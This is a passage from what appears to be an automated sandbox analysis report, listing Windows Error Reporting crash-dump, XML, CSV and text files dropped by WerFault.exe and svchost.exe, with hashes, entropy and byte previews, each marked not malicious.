Preview:	MDMP..a..... .......&..f........................l...........$....B..........T.......8...........T........... "...j..........X...........D...............................................................................eJ..............GenuineIntel............T.......t......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED21.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:34 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	105842
Entropy (8bit):	1.883787973455189
Encrypted:	false
SSDEEP:	384:0fXQPzgcRVsApTVfnaAc+j1LILJ7D3IHFv9:J7fRVsApTsH+RspM
MD5:	D6AC8200A8E8ABCC70ED44F2B988985C
SHA1:	8E29F970B8CAF102429F3883C267F050A910C469
SHA-256:	BBC47C2D8B2DBE9BC68C99D2002E0B608A03096F2896A72921A22278741E5465
SHA-512:	A90A66C0F173F210D547A3AD5C1F2CF8450CD64E73D3CCA7282A59CB790BA2AFB231B831E1F69941726D0B1A7570AABE7D5136E85350469131E3E2D95A238A91
Malicious:	false
Preview:	MDMP..a..... .......&..f........................l................B..........T.......8...........T............!...{..........X...........D...............................................................................eJ..............GenuineIntel............T.......H......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE2B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8380
Entropy (8bit):	3.7092037197584102
Encrypted:	false
SSDEEP:	192:R6l7wVeJo16S6Y9RSU9BFgmfOeprO89bcmsfDUm:R6lXJS6S6YrSU9BFgmfO8cFf1
MD5:	E9DE01B93A980D95191FB2D0DF5D6E74
SHA1:	5BD15CF6362D99409DEA341AD01F24915E8D3D88
SHA-256:	220388650CDEEC7097E8EB16EFC266202E002E23439C22C6F8F6F1223DCCD27D
SHA-512:	4A0B25DBE42F6F6B1B382C9436670847AE6E3E73A1E9B61852BC3EF4F2BD522BBC4AB4922465E047987198EC9A7910FE676195D09CA561104FC56EA3D7D10E5D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE5B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4649
Entropy (8bit):	4.525883075279318
Encrypted:	false
SSDEEP:	48:cvIwWl8zs/Jg77aI9cyyWpW8VYeUYm8M4J0qFy+q8ca01JLud:uIjfhI7iu7VDJ4RPLud
MD5:	DD4A7765752348C968AD4F6834726568
SHA1:	78F92A788FF8522DE13413AD6BC4E5F7788A4FCE
SHA-256:	8CB04C40C9630D69AA7A4C54AC2BAD3D23FBEDA24C5DA10B114A1466EA97EFA1
SHA-512:	16C90D5525A19C182022664D61295FB29A983B414952DD6963EFCDF55DBCCFC1697C78818EA070EA1491C5F8C6E799B5C7683A6C3355216E91AFAA14B6162D1C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE78.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80212
Entropy (8bit):	3.058672480383592
Encrypted:	false
SSDEEP:	768:NOE03j+aGlxAuhqYVIR9xhLOjHZzQjRRIsroLkwvP:NOEej+aGfMg89xNMH94Ks8dvP
MD5:	E61375446B7E459491F8BA5A648476C5
SHA1:	ADBE2E5CCC3656D8EA744C1F12C2A931E02D46BE
SHA-256:	8200791CF320FA43D657DAEC25F574AB1C891F319BD53CF32D54230EDC008BF0
SHA-512:	648C606DA45B436598378F2B62DC0F33FB6B735AAAA00D86A7511FC1C340D9FA75939AA8AF7BAC05D6D8859AE62099A771912E1564F9547B2A9B541930F6BEB5
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE7A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8380
Entropy (8bit):	3.7115124837894915
Encrypted:	false
SSDEEP:	192:R6l7wVeJpk6A6Y9GSU9BFgmfOepr789bcUsfwUm:R6lXJq6A6Y8SU9BFgmfOXcHfi
MD5:	68FCE48D619EDA52C03DE112398A40CF
SHA1:	6C207849151D1F72DAD41642E326306654704C0A
SHA-256:	C58F0EE7BB3FECE5E929A178BE1628CB4B8FD5AD3853E5640679DA881CB68611
SHA-512:	433CA6A8B657340C3F9CFAF732FB0EDB515F4A0F43075B72D969EFE90B69F40FACC0260AB7F14666D6593E00DE3DEA08A99868F3D8D2EF5A85B13C6853BDF84C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEC9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4649
Entropy (8bit):	4.523827552152781
Encrypted:	false
SSDEEP:	48:cvIwWl8zs/Jg77aI9cyyWpW8VYe3Ym8M4J0qFX+q8cdI01JLJd:uIjfhI7iu7VgJZrlPLJd
MD5:	7EEA285B0F8A2E8B110BAF15126B7CB5
SHA1:	BBF4F3B5DA09476F0C9C243453D2C5AFA9BE50DB
SHA-256:	39CA7A6B8715697ACA3ED18EDA5236B96DC4224A0E09D10BEF4865AE2852C87F
SHA-512:	1010F3A43580D71465AB7BD2BA3353B11FB61E3DF9FFFD59175D17BDBA19458BB7ACC936BF4EE17C1E20FCCE3C1BBC0CF5BFC23090E8D05DBBF5ACD907AC9866
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF06.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80220
Entropy (8bit):	3.0587310885490884
Encrypted:	false
SSDEEP:	768:gxi2Hsm+aGlxAuhqYvIR9xhLOjYZBQjRRIsWJLPwn:gxi2Mm+aGfM689xNMYP4KsOsn
MD5:	72D7CA7CF6130DBE86FBF6887F3B3DD1
SHA1:	F5C96F59822B304880D595B7FB056BDBA9CD7176
SHA-256:	425AEDBA0FA2F356190D4B1B83601E71138317C7B4DF9960E1A6DD9908B9BAC3
SHA-512:	FE8CF2A99A4AC345773EFC9BC0B731A021D6C3E1CBA7395FA065279CB473658F36DB2E8CAF7E31E6D86DAE8CAB9153ACE41218A5427F5CFF3E2C2246ED998221
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF43.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:35 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	103078
Entropy (8bit):	1.9796400625314967
Encrypted:	false
SSDEEP:	384:FXQPz8cesAPWKIY0/ZT3JC2G27y+sVgT5coL6XmUgXR5:+7TesqrMdCEyTq7Jb
MD5:	DFD7FD31649B9B64BAEEFE2FDA88D90B
SHA1:	A4C1BD281F6A05CA9A811CA663947F018593676F
SHA-256:	96FEAE87F16F95333FD92461E0B6AE28F345FB393C05F7CC5051A65887C41BBE
SHA-512:	BBC79684DFC9D4F16EF0961FEF04194CF44368BF90012B1D802293DC3B98943BC24D5421513E7FE9AE5CDCE365B10AE7A8C700390806343D1DF1DE67502B5DA5
Malicious:	false
Preview:	MDMP..a..... .......'..f........................l...........t....B..........T.......8...........T........... "...p..........X...........D...............................................................................eJ..............GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF84.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6849824284655335
Encrypted:	false
SSDEEP:	96:TiZYWuYr1q6aYQhY+WYjHSPYEZRgtHicIwIyw6CIpaiJ3af6MZJrIbA3:2ZDurVh0sCkaiJ3af6MZJkbA3
MD5:	8DCA02EDAB268D10724BF6689762F56F
SHA1:	B8BB1A8927428150319841283A80E19B76C7047B
SHA-256:	E8A02C5705B1E053A4EE174412A5D87B427586A14B11EE825326F35628552164
SHA-512:	8924459ABC41D82BE8DC8740908FB9AC9F32345663434C7E744189742C84CD50D45DFCF1F4C80BBCDB9ADB23253DFC10AFADE168CA7169BF566ED0D83502D84E
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFE3.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685322671569264
Encrypted:	false
SSDEEP:	96:TiZYWGklNXn6HYQtYtWHbHSPYEZQ7tHi/ItI1PwaONai3adMjJEIiA3:2ZDGnVtTq3iai3adMjJziA3
MD5:	858DFCA106F47A88C9F6CE8050B0DD1C
SHA1:	A0C0CC551BFF09FD24DF03021AC03917C95EC890
SHA-256:	347B74FBB5CB71F9429D3F41C6EFEAA03132EC1B330AC03CB4B8C64ED6754CF5
SHA-512:	4FC1E53FC2C44BA8BFD63D053DF5BFB1909DA44163B250E061557425B31319F0C6713BEB377C3841E470A8A4819B3D45A42957782405E7D0B84BCC3684DA1904
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF07D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8380
Entropy (8bit):	3.7098203340845592
Encrypted:	false
SSDEEP:	192:R6l7wVeJyw6RcC6Y9hSU9BFgmfOeprt89bl+sfTOQXm:R6lXJt6v6YrSU9BFgmfOhl9fat
MD5:	81FFDF97F32E548373EF65A5FA1531C2
SHA1:	E4D5965532814D04F1349871CCDDDED53F7B0969
SHA-256:	CF2F4824A731CDBD6CAAB413A71082157D5121800F117EE2FD679EE28EC46DF7
SHA-512:	6B1AD531C0D8CF4078B84FCA7F5CC2C61BCECB4AE64AD2B3C6A3334868AE09FAA378D45D7528E73843638A7814DD543E0E36008C00AF77A9402E797E4D8F1950
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0AD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4649
Entropy (8bit):	4.520792077034609
Encrypted:	false
SSDEEP:	48:cvIwWl8zs/Jg77aI9cyyWpW8VYemYm8M4J0qFh+q8cK01JLYd:uIjfhI7iu7VBJ3pPLYd
MD5:	6F19B37EDA0B49EF7953909C586ECD25
SHA1:	7FE10527C0BD71683521E1C779EEB963C48241A4
SHA-256:	89DA961D23550F76471EC83F24350C34016F9CF401A4B11F84132E09A0157C25
SHA-512:	B62DC45EA9D118CB23B87B64A96EFC598E213DB319EB4FEE2BC61E7C31515D5128B3112DFA15260E4F33B40259196758613795DA37DAC7952F1ED6A56C5FAE05
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0BE.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80640
Entropy (8bit):	3.0583512831625304
Encrypted:	false
SSDEEP:	768:HrBSD3TkEyKxAumqYVIR+gwLOjYZBQjRQIsjOzmL8saFy:HrBSrTkEyOVg8+gmMYP4/sjd5t
MD5:	51B9C99992E2EBECB60B553FEAC49727
SHA1:	83A5E065F01613557C5F8AABD1CBEBBC201AA7AB
SHA-256:	C7E071E9D51CC2477599643518038C3191A5A74E05C70C444960EF6D61504D43
SHA-512:	AB07C921972AAE04331EF52DE0A29010A240BB9046E96B14C9A2042FF4706CEFCCCB60A8FFBE5C7A88037386B4433CFF41DE456D71D97D88DD2D37C25935C097
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF13C.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
